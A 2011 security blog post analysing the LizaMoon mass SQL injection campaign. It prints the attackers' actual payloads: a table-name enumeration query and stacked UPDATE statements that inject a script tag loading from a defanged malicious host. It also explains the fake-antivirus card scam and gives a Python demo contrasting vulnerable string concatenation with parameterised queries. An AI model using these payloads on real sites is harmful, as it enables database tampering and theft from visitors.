Tuesday, April 5, 2011

SQL injection LizaMoon

I might be naïve, but each time I analyze a mass SQL injection incident I can’t stop thinking about the fact that this class of vulnerability has been with us for more than 10 years!
And yet again, over the last few days there has been a lot of coverage of a new automated SQL injection attack called LizaMoon, affecting over 1,500,000 pages around the world. What makes this attack interesting is that it consists of several steps:

  • An automated mass SQL injection attack that tries to inject JavaScript into as many pages of the application as possible (only a <script src=...> tag is written into the database; the JavaScript itself is hosted on a remote site), using the following payloads:

SQL query that retrieves table names (and, with INFORMATION_SCHEMA.COLUMNS, field names), one per request: comparing the integer 1 with the nvarchar TABLE_NAME makes SQL Server raise a conversion error that echoes the table name back in the page, and bumping TOP 0 to TOP 1, TOP 2, ... in the inner subquery walks through the table list

11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--



SQL UPDATE that writes the script tag into the database. The strings REPLACE works on are assembled from char() calls joined with + (%2B is the URL-encoded +), so the payload needs no quote character beyond the one that closes the Id literal, and the column is cast to varchar(8000) because REPLACE does not accept text/ntext columns. The “....” marks are where the original analysis abbreviated the char() run, and the script URL is written with httq:// and a masked host so that it is not clickable

Id=1'+update+tb+set+Descripcion=REPLACE(cast(Descripcion+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)....</title><script src=httq://lazemxxn.com/ur.php></script>...%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

Id=1'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)....</title><script src=httq://lazemxxn.com/ur.php></script>...%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--


  • The injected JavaScript redirects the user to a malicious site which pretends to scan the client computer for viruses and “finds” malware on it; of course, it is all just a big scam.
  • At this point the user is asked to download the fake anti-virus software, named “Windows Stability Center”.
  • After running the fake anti-virus, the program’s UI displays warnings that many problems were discovered on the PC, and the user is asked to buy the full version of “Windows Stability Center” by entering personal and payment details, including the credit card number and CVV.

As you can see, it is a sophisticated, multi-stage attack _just_ to steal users’ credit card numbers.
Going back to the start of this post: since SQL injection first appeared, application security has been fortified with IDS/IPS, security awareness work (OWASP), vulnerability scanners, static code analysis and web application firewalls, and still this attack is alive and kicking.
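None of those layers can help when the application itself splices the Id parameter into the statement text, which is what the payloads above rely on. The following added example (my own code, not from the post) shows that pattern beside the parameterised query that removes it. SQLite stands in for SQL Server, so the stacked statement needs an explicit ';' and uses quoted literals instead of char() concatenation; executescript() models a driver of that era that runs several statements per request, since Python's own execute() refuses to. The table, its rows and the payload are constructed for the demo.

```python
import sqlite3

# Defanged script host as written in the post; the tag is what the attack
# writes into stored page content.
SCRIPT_TAG = "<script src=httq://lazemxxn.com/ur.php></script>"

# Constructed stand-in for the SQL Server payload: SQLite needs an explicit ';'
# before the stacked statement (SQL Server runs "... 1 update ..." without one)
# and plain quoted literals replace the char() spelling of the real payload.
PAYLOAD = (
    "1; UPDATE tb SET Descripcion = "
    "REPLACE(Descripcion, '</title>', '</title>' || '" + SCRIPT_TAG + "')"
)


def fresh_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows (column names from the post)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE tb (Id INTEGER PRIMARY KEY, Descripcion TEXT);"
        "INSERT INTO tb VALUES (1, '<title>Home</title><p>Welcome</p>');"
        "INSERT INTO tb VALUES (2, '<title>About</title><p>Who we are</p>');"
    )
    return conn


def stored_descriptions(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT Descripcion FROM tb ORDER BY Id")]


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> str:
    """Concatenates the request parameter into the statement text, the flaw the
    LizaMoon payloads exploit.  executescript() stands in for a driver that runs
    every statement it is handed, so the attacker's UPDATE executes next to the
    intended SELECT.  Returns the SQL that actually ran, i.e. what the server saw."""
    sql = "SELECT Descripcion FROM tb WHERE Id = " + user_id
    conn.executescript(sql)
    return sql


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterised form: the whole value is bound as a single literal, so the
    ';' and the UPDATE are just characters in a string that matches no Id."""
    rows = conn.execute("SELECT Descripcion FROM tb WHERE Id = ?", (user_id,))
    return [row[0] for row in rows]


def demo() -> dict:
    """Run the same payload through both lookups on separate databases."""
    vuln = fresh_db()
    ran = lookup_vulnerable(vuln, PAYLOAD)
    safe = fresh_db()
    rows = lookup_safe(safe, PAYLOAD)
    return {
        "sql_run_by_vulnerable_lookup": ran,
        "vulnerable_db_after": stored_descriptions(vuln),
        "safe_rows_for_payload": rows,
        "safe_db_after": stored_descriptions(safe),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it and the vulnerable database comes back with the script tag spliced after `</title>` in every Descripcion, while the parameterised lookup returns no rows for the same input and leaves the table untouched. A WAF or IDS in front of this is a second line of defence; the parameter binding is what actually closes the hole.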

More information can be found in the links below.
An interesting video presented by Websense (embedded video):

Detailed attack scenario:
http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
